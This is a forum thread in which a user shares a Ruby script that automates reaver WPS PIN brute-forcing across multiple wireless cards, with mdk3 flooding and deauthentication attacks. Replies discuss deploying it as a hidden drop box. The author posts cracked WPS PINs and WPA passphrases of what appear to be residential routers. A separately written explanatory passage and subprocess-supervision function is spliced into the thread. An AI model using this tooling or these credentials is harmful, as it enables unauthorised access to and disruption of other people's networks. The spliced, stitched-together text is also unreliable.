i8igmac Posted February 2, 2015 (edited)

So, I have decided to share one of my projects. I figure I won't get much attention with this script, which is why I'm sharing... I made a video I hope is quick to the point and informative... please share your comments... If there are any interested I may add some more functions to this script, like capturing handshakes for cracking later... All you need is a Linux machine, a wireless adapter (the more the better), Ruby and a Ruby requirement, open3... Updated code:

```ruby
require 'open3'

# on reboot stuff.
device = ""
channel = ""
ap_mac = ""
essid = ""
@device_list = ["wlan1"]
@check = []

# sleep 30   # sleep if you plan to start this script from startup.rc... give drives a chance to load

# `ifconfig wlan0 down`
# `iwconfig wlan0 mode monitor`
# `ifconfig wlan0 up`
`ifconfig wlan1 down`
`iwconfig wlan1 mode monitor`
`ifconfig wlan1 up`

# Process.kill raises Errno::ESRCH once the child has already exited; ignore that.
def kill_quiet(pid)
  Process.kill("KILL", pid)
rescue Errno::ESRCH
  nil
end

# will not launch until the "while true" at the bottom
# reaver attack and log
def reaver(device, channel, ap_mac)
  Thread.start {
    # `ifconfig #{device} down`
    # `iwconfig #{device} mode monitor`
    # `ifconfig #{device} up`
    # puts "Random mac..."
    Open3.popen3("iwconfig #{device} channel #{channel}")
    puts "change #{channel}"
    Open3.popen3("ifconfig #{device} down")
    puts "down"
    # Open3.popen3("macchanger #{device} -r")
    puts "changemac"
    Open3.popen3("ifconfig #{device} up")
    puts "up"
    puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}"
    Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}") { |i, o, t, p|
      i.puts("y") # tell reaver Yes to continue where the attack left off
      loop do
        # wait up to 15 s for output BEFORE the blocking read; a select placed after gets never fires
        if select([o], nil, nil, 15)
          line = o.gets
          break if line.nil? # reaver exited
          puts "#{device} #{ap_mac}: #{line}"
          log_all = File.open("log_all_#{ap_mac}", 'a')
          log_all.puts("#{device} #{ap_mac}: #{line}")
          log_all.close
          # 100.00% complete
          # Pin cracked in
          # WPS PIN: '12345678'
          # WPA PSK: 'asshole'
          # AP SSID: 'noob'
          # Log success to another file
          if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:")
            success = File.open("sucess_#{ap_mac}", 'a')
            success.puts("#{device} #{ap_mac}: #{line}")
            success.close
          end
          if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row")
            puts "#{device} #{ap_mac}: killing thread"
            @check.delete(device) # remove the card from the list... can now be used in a new process
            kill_quiet(p.pid)
          end
        else
          puts "#{device} #{ap_mac}: TIMEOUT"
          @check.delete(device)
          kill_quiet(p.pid)
          break
        end
      end
      @check.delete(device)
      kill_quiet(p.pid)
    }
    @check.delete(device)
  } # Thread.start
end

# will not launch until the "while true" at the bottom
def mdk3(device, channel, ap_mac, essid)
  Open3.popen3("iwconfig #{device} channel #{channel}")
  Thread.start { Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}") { |i, o, t| while line = o.gets; puts line; end } }
  Thread.start { Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024") { |i, o, t| while line = o.gets; puts line; end } }
  Thread.start { Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024") { |i, o, t| while line = o.gets; puts line; end } }
  Thread.start { Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}") { |i, o, t| while line = o.gets; puts line; end } }
  Thread.start { Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}") { |i, o, t| while line = o.gets; puts line; end } }
end

# 44:94:FC:3B:E9:16 7 ANDY DALTON SOUR HOUR
# 28:C6:8E:A3:10:7A 11 NETGEAR01
# the main reason for this script:
# if you let reaver run for too long, it may hang without any data output (frozen state)... so killall and restart
# just added a few extra dos attacks
# reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6
# reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8
def gather
  scan_complete = false
  while scan_complete == false
    @device_list.each { |wlan|
      if not @check.include?(wlan)
        puts "#{wlan} scanning with wash"
        buff = ""
        Open3.popen3("wash -i #{wlan} -C") { |i, o, t, p|
          Thread.start { sleep 25; kill_quiet(p.pid) } # wash does not exit on its own; stop it after 25 s
          while line = o.gets; buff << line; end
        }
        @list = []
        buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line { |x|
          # keep "channel bssid" for every AP whose WPS Locked column reads "No"
          if x.include?("No"); @list << "#{x.split[1]} #{x.split[0]}"; end
        }
        puts @list
        scan_complete = true
        break
      else
        puts "waiting for device to free up... redo"
        sleep 3
        next
      end
    }
  end
end

try_again = false
while true
  gather
  @list.each { |stack|
    # puts "trying #{stack}"
    sleep 1
    @device_list.each { |wlan|
      if not @check.include?(wlan)
        puts @check
        @check << wlan
        # reaver("wlan2", "6", "20:76:00:1C:D9:C8")
        reaver("#{wlan.chomp}", "#{stack.split[0]}", "#{stack.split[1]}")
        try_again = false
        break
      else
        try_again = true
      end
    }
    if try_again == true
      redo
    end
  }
end
```

Edited September 15, 2015 by i8igmac
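The comment in the script above gives its reason for existing: a child process that stops producing output and must be killed and restarted. That is a generic subprocess-supervision problem, and the script's own attempt at it has a subtle flaw (a select placed after a blocking gets can never time out). The following is an added example, not part of the original script or the author's code, showing the pattern done correctly in Ruby: IO.select runs before the read, the child is spawned in its own process group so the kill also reaches anything it spawned, and the child is reaped afterwards. The function name run_with_idle_timeout and the sh commands used to demonstrate it are constructed for this example; no real tool is invoked.

```ruby
require 'open3'

# Supervise a child process: stream its combined stdout/stderr line by line
# and kill it (together with anything it spawned) if it goes quiet for more
# than idle_timeout seconds. Returns [lines, reason], where reason is
# :exited when the child finished on its own and :timeout when we killed it.
def run_with_idle_timeout(cmd, idle_timeout: 15)
  lines  = []
  reason = :exited
  # pgroup: true puts the child in its own process group, so a signal sent to
  # -pid also reaches grandchildren that would otherwise keep the pipe open.
  Open3.popen2e(cmd, pgroup: true) do |stdin, out, wait_thr|
    stdin.close
    loop do
      # IO.select must run BEFORE the blocking read: once gets has blocked,
      # a select placed after it can never return early.
      ready = IO.select([out], nil, nil, idle_timeout)
      if ready.nil?
        reason = :timeout
        begin
          Process.kill('KILL', -wait_thr.pid) # negative pid = whole process group
        rescue Errno::ESRCH
          # already gone; nothing to do
        end
        break
      end
      line = out.gets
      break if line.nil? # EOF: the child exited on its own
      lines << line.chomp
      yield line.chomp if block_given?
    end
    wait_thr.value # reap the child so no zombie is left behind
  end
  [lines, reason]
end

# Stand-alone demonstration with constructed commands (plain sh, not any real tool).
if __FILE__ == $0
  p run_with_idle_timeout("sh -c 'echo one; echo two'", idle_timeout: 5)
  p run_with_idle_timeout("sh -c 'echo start; sleep 30'", idle_timeout: 1)
end
```

The first call returns `[["one", "two"], :exited]`; the second prints `start`, then goes quiet, and is killed after one second, returning `[["start"], :timeout]`. Passing a block lets a caller classify each line as it arrives (logging, success or failure markers) without the supervision logic knowing anything about the command being run.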
i8igmac (Author) Posted September 11, 2015

I decided to open this script last night and launch this attack. (In a controlled test environment of course.) In about 4 hours I have cracked 4 wireless access points... it really is a success! The way this algorithm controls reaver and can micro-manage multiple Alfa cards to quickly alternate through a list of access points... set it and forget it... only need Kali and a wifi card, the more the better! I really need to work on my presentation... EDIT: check the new script above and video
ZaraByte Posted September 11, 2015 (edited)

Hey, that's pretty neat right there. I'm gonna check this out in a bit. Like I said in your video comments, you should try updating your script to work with the pixie dust attack.

Edited September 11, 2015 by ZaraByte
i8igmac (Author) Posted September 12, 2015

> Hey, that's pretty neat right there. I'm gonna check this out in a bit. Like I said in your video comments, you should try updating your script to work with the pixie dust attack.

I'll look into this pixie dust attack. I may put this on a GitHub... I'll clean it up and correct the output... Currently works well when I place this script in my /etc/rc.local... it just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds...
ZaraByte Posted September 12, 2015

> I'll look into this pixie dust attack. I may put this on a GitHub... I'll clean it up and correct the output... Currently works well when I place this script in my /etc/rc.local... it just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds...

I'd like to know how you install open3. I've never messed with Ruby before, so this is new to me. I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built-in battery on it.
i8igmac (Author) Posted September 14, 2015

> I'd like to know how you install open3. I've never messed with Ruby before, so this is new to me. I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built-in battery on it.

I updated the script above. I didn't change much; you will notice on the reaver command `-K 1`. It seems that reaver is attacking the chip driver, K 1, 2, 3... I would think reaver is capable of detecting the wireless chip and performing this attack without even declaring -K.

I can't remember how I installed open3. I believe installing Metasploit may include open3.

```
gem install open3
apt-cache search open3
```

There is a GitHub, I believe... You can `require '/home/some/git/clone/location/open3.rb'`.

This device you posted looks interesting... I'm interested in a device advertised on the Kali home page, 'trim slice', runs on 12v.
vailixi Posted September 15, 2015 (edited)

This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it. This is right there with wifite for easy mode. It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this?

Actually you could just put something like this into the script where the reaver WPS attack fails.

```ruby
Open3.popen3("wifite -b #{ap_mac}")
```

This just looks right but I don't know Ruby.

Edited September 15, 2015 by vailixi
i8igmac (Author) Posted September 15, 2015

> This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it. This is right there with wifite for easy mode. It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this?
>
> Actually you could just put something like this into the script where the reaver WPS attack fails.
>
> `Open3.popen3("wifite -b #{ap_mac}")`
>
> This just looks right but I don't know Ruby.

I have done this before, using 2 cards: set one card to log the handshakes, and another card to deauth all clients... I spent some time scripting all this kung fu and it was a part of my script, but it turns out I found a simpler way...

```
airodump-ng wlan0
mdk3 wlan1 d
```

(deauthenticate all clients from all access points)
vailixi Posted September 15, 2015

Does this option run a single deauthentication? Or does it do it continuously, creating a denial of service?

```
mdk3 wlan1 d
```

Or can you set the number of deauth requests like you can with aireplay-ng?
i8igmac (Author) Posted September 15, 2015

I don't remember exactly. It looks like it cycles through all clients... I tested it for about a minute... I should start a little tutorial on Ruby automated wifi attacks... starting with a custom deauth attack using airebase...

```ruby
Thread.start { Open3.popen3("airodump-ng -w log -d wlan1") }
```

This will start logging, in plain text, a CSV file which holds all the clients associated with an access point. All the information you need is easy to access in Ruby... you just need to organize everything and launch an attack of your choice...
IvanDoe Posted September 16, 2015

Thanks for sharing this :) I'll try it out.
i8igmac (Author) Posted September 16, 2015

> Thanks for sharing this :) I'll try it out.

If you install open3 successfully, post your install method... I never had any problems but can't remember my install method.
IvanDoe Posted September 16, 2015 (edited)

> If you install open3 successfully, post your install method... I never had any problems but can't remember my install method.

Sure, I'll try to set it up today or tomorrow.

I didn't code in Ruby before, but it seems like I need to add wlan2 here?

```ruby
@device_list=["wlan1"]
```

Not sure what syntax Ruby uses for multiple parameters?

From the code it seems like each wifi card tries to crack its own access point? In the video I don't see the script running the mdk3 attack on an access point, but I see a function for the attack in the script?

Thanks for the help, I just want to figure out how it actually works :)

Edited September 16, 2015 by IvanDoe
IvanDoe Posted September 16, 2015

Ok, so I tried the script via VMware. I do have a Raspberry around but figured I'd try it in a VM first.

I used Kali 2, didn't have to install open3, worked out of the box; I just had to change the interface name in the script, wlan1/wlan2.

Stopped it after a few minutes but it seems to work cool. I'll set Kali on the Raspberry and try it out as a dropbox somewhere :)

Anyway, as I posted yesterday, the Alfa AWUS036NEH seems to have driver issues or something else with Kali 2.0 (monitor mode won't show any access points), so I used the older AWUS036H with this script.
i8igmac (Author) Posted September 18, 2015 (edited)

> Ok, so I tried the script via VMware. I do have a Raspberry around but figured I'd try it in a VM first.
>
> I used Kali 2, didn't have to install open3, worked out of the box; I just had to change the interface name in the script, wlan1/wlan2.
>
> Stopped it after a few minutes but it seems to work cool. I'll set Kali on the Raspberry and try it out as a dropbox somewhere :)
>
> Anyway, as I posted yesterday, the Alfa AWUS036NEH seems to have driver issues or something else with Kali 2.0 (monitor mode won't show any access points), so I used the older AWUS036H with this script.

Glad to see it worked for you... I figured it would work out of the box on a Kali machine...

Update on my findings using one wireless card to attack multiple access points in a multi-threaded or multi-processed fashion... I did successfully crack a new device with this configuration...

```ruby
@device_list=["mon0","mon1","mon2", "wlan1"]
```

I ran `airmon-ng start wlan1` several times on a single wireless card to create multiple tap devices... then launched the script... This script is designed to micro-manage multiple interfaces... I would like to see if anyone objects to this kind of setup... I have done this before in the past with other kinds of attacks...

Take a look at this scan of airodump...

```
airodump-ng wlan1 --essid-regex=my
z0:4A:03:C3:D6:B5  -55  17  0  0  11  54 .  WPA2 CCMP PSK  myqwest6671
z8:39:44:5B:48:AC  -56  20  0  0   6  54e   WPA2 CCMP PSK  myqwest6322
z0:26:88:E2:CF:28  -60   6  1  0  11  54e   WPA2 CCMP PSK  myqwest3957
z0:24:7B:6F:A5:D4  -66   6  1  0  11  54    WPA2 CCMP PSK  myqwest6947

airodump-ng wlan1 --essid-regex=HOME
z4:04:15:0F:42:14  -48  11  0  0  11  54e   WPA2 CCMP PSK  HOME-7EC8_EXT
zC:35:40:75:38:99  -53  10  0  0   1  54e   WPA2 CCMP PSK  HOME-3899
z8:7B:8C:26:EE:F5  -54   3  2  0   1  54e   WPA2 CCMP PSK  HOME-051F_RE
z8:F7:C7:66:19:8F  -56  11  0  0  11  54e   WPA2 CCMP PSK  HOME-198F
z0:71:C2:EF:7E:D0  -56  10  0  0  11  54e.  WPA2 CCMP PSK  HOME-06B1-2.4
z4:AB:F0:11:D0:90  -62   4  0  0   6  54e   WPA2 CCMP PSK  HOME-D092
z4:BE:F7:E8:BA:48  -63   4  0  0   6  54e.  WPA2 CCMP PSK  HOME-5AF7-2.4
z0:1D:D4:8C:19:00  -63   5  0  0   6  54e   WPA2 CCMP PSK  HOME-1902
z4:85:2A:97:9D:D8  -67   2  0  0   6  54e.  WPA2 CCMP PSK  HOME-7804-2.4
```

Why would you think these routers share the same name? Perhaps these are identical devices, identical firmware or hardware issued by identical Internet service providers... Look at these cracked pins... I'll bet you money I can guess the default pin for all the routers above!

```
wlan1 z0:26:88:E2:CF:28: [+] WPS PIN: '12345670'
wlan1 z0:26:88:E2:CF:28: [+] WPA PSK: 'pupy20103251'
wlan1 z0:26:88:E2:CF:28: [+] AP SSID: 'myqwest3957'
wlan1 z0:71:C2:EF:7E:D0: [+] WPS PIN: '12345670'
wlan1 z0:71:C2:EF:7E:D0: [+] WPA PSK: '9H3TDTH9HVCPDT7Y'
wlan1 z0:71:C2:EF:7E:D0: [+] AP SSID: 'HOME-06B1-2.4'
mon1 z0:76:00:1C:D9:C8: [+] WPS PIN: '12345670'
mon1 z0:76:00:1C:D9:C8: [+] WPA PSK: 'i6bz7dd8s7haxt'
mon1 z0:76:00:1C:D9:C8: [+] AP SSID: 'myqwest4681'
wlan1 z8:39:44:5B:48:AC: [+] WPS PIN: '12345670'
wlan1 z8:39:44:5B:48:AC: [+] WPA PSK: '003368f2006dd11b8b052f0995'
wlan1 z8:39:44:5B:48:AC: [+] AP SSID: 'myqwest6322'
wlan2 z4:E0:C5:03:D9:23: [+] WPS PIN: '00000000'
wlan2 z4:E0:C5:03:D9:23: [+] WPA PSK: 'akDztnO2giB53LYSUr5JHUSQ4xJD78'
wlan2 z4:E0:C5:03:D9:23: [+] AP SSID: 'SEC_LinkShare_f50c6f'
```

So, try to imagine why reaver has failed to crack all these default pins... SIGNAL STRENGTH!!! The success packet holding all the gold just never made it to your machine, and reaver reported a failed attack after long hours of work... To build a successful attack, all I need is a list of default pins and a directional antenna... Bob's your uncle... PeWnND lol

Edited September 18, 2015 by i8igmac
ZaraByte Posted September 22, 2015

Can I ask how many wireless cards you're using? I'd like to do a video on this and credit you in the video. Also, which version of Kali Linux are you using for your Pi, is it 2.0 or the older version of Kali Linux ARM?
i8igmac (Author) Posted September 23, 2015

Currently, my Raspberry Pi in my attack space is running Kali 1, updated reaver that includes pixiedust, Aircrack-ng 1.2 rc1 (I don't think it will matter).

How many cards do you have? In my previous post I was successful with only using one card and creating multiple tap interfaces mon0 mon1 mon2 mon3. There is a bit of an adjustment I need to make to get better performance with this method... You're better off running the script like below. Change this line at the top of the script (the list needs one interface per script instance; a bare `ARGV[0]` would be a String and `.each` would fail):

```ruby
@device_list = [ARGV[0]]
```

Open several terminals, and run like this... of course stop network managers and such...

```
ruby script.rb wlan0
ruby script.rb wlan1
ruby script.rb wlan2
ruby script.rb wlan4
ruby script.rb wlan5
```

There is so much to explain and I will fail to get the information out properly ,-) Different devices show different scan results, so the same goes for devices using different antennas... I hope to get more time to modify things and help you create a better video! I feel like a nerd talking to his laptop.
deadlyhabit Posted September 24, 2015 (edited)

Not too familiar with Ruby (something new to delve into), but would it be possible to add/modify the script to send an email on success to something like Gmail which, alongside a cell phone alert, lets you know it's done? Like in Python:

```python
import smtplib


def send_email(user, pwd, recipient, subject, body):
    gmail_user = user
    gmail_pwd = pwd
    FROM = user
    TO = recipient if type(recipient) is list else [recipient]
    SUBJECT = subject
    TEXT = body

    # Prepare actual message (a plain "From:" header; a leading backslash
    # would end up literally in the header)
    message = """From: %s\nTo: %s\nSubject: %s\n\n%s
    """ % (FROM, ", ".join(TO), SUBJECT, TEXT)
    try:
        server = smtplib.SMTP("smtp.gmail.com", 587)
        server.ehlo()
        server.starttls()
        server.login(gmail_user, gmail_pwd)
        server.sendmail(FROM, TO, message)
        server.close()
        print('successfully sent the mail')
    except (smtplib.SMTPException, OSError):
        print("failed to send mail")
```

http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python

Working on something similar in Python to automate attacks for Kali, ideally suited for NetHunter and potentially a Bluetooth-paired Android smartwatch as well.

Edited September 24, 2015 by deadlyhabit
ZaraByte Posted September 24, 2015

I'm getting errors after pasting it in vi and trying to run this on NetHunter.

```
root@kali:~# ./autopwn.rb
./autopwn.rb: line 1: require: command not found
./autopwn.rb: line 8: @device_list=[wlan1]: command not found
./autopwn.rb: line 9: @check=[]: command not found
./autopwn.rb: line 19: syntax error near unexpected token `('
./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)'
```

Would be nice if someone could make this into a bash script; it'd be more compatible.
DataHead Posted September 24, 2015

I'd like to make note that -vvv is required for the newer / updated builds of our reaver fork for it to work with pixiedust collection and -K 1.
i8igmac (Author) Posted September 25, 2015 (edited)

> I'm getting errors after pasting it in vi and trying to run this on NetHunter.
>
> ```
> root@kali:~# ./autopwn.rb
> ./autopwn.rb: line 1: require: command not found
> ./autopwn.rb: line 8: @device_list=[wlan1]: command not found
> ./autopwn.rb: line 9: @check=[]: command not found
> ./autopwn.rb: line 19: syntax error near unexpected token `('
> ./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)'
> ```
>
> Would be nice if someone could make this into a bash script; it'd be more compatible.

NetHunter is Kali?

```
root@kali:~# ruby autopwn.rb
```

@datahead I don't know much about reaver's pixiedust function. My understanding is k1 k2 k3 will target a specific chip driver?

Edited September 25, 2015 by i8igmac
ZaraByte Posted September 25, 2015

> NetHunter is Kali?
>
> `root@kali:~# ruby autopwn.rb`

Working now! I was trying to run it as a bash script; running with ruby first works just fine, no issues! The script works really nice, but this script would be epic if someone converted it to a Bash script, because then it might work on devices like the Pineapple.
i8igmac (Author) Posted September 25, 2015

I'm sure it can be done, I never bothered with bash... I chose Ruby because Metasploit developers chose Ruby... And I facking luv it!
ZaraByte Posted September 25, 2015 (edited)

> I'm sure it can be done, I never bothered with bash... I chose Ruby because Metasploit developers chose Ruby... And I facking luv it!

It'd be cool to see it as a bash script. I'm not sure if you can install Ruby on OpenWRT or not, but I'd love to put this script on a TP-LINK MR3040; that'd be so awesome to use, but the only issue is the wireless card. Sadly, I found out the TP-LINK MR3040 needs a USB drive to hold files, because I don't think it has enough internal memory to hold a lot of stuff. This Ruby works fine on the Nexus 7 2013 WiFi tablet with NetHunter 2.0 installed; you just need to follow deadlyhabit's guide on getting monitor mode to work.

Edited September 25, 2015 by ZaraByte
i8igmac (Author) Posted September 25, 2015

A quick search and I found Ruby install guides for OpenWRT. I believe in Kali; OpenWRT has too many limitations... I plan on buying a new device to replace the Pi... the amount of cords connected to my Pi resembles a hot mess... If I can eliminate the powered USB hub, maybe I can with a 12v orange slice? Mobile is key.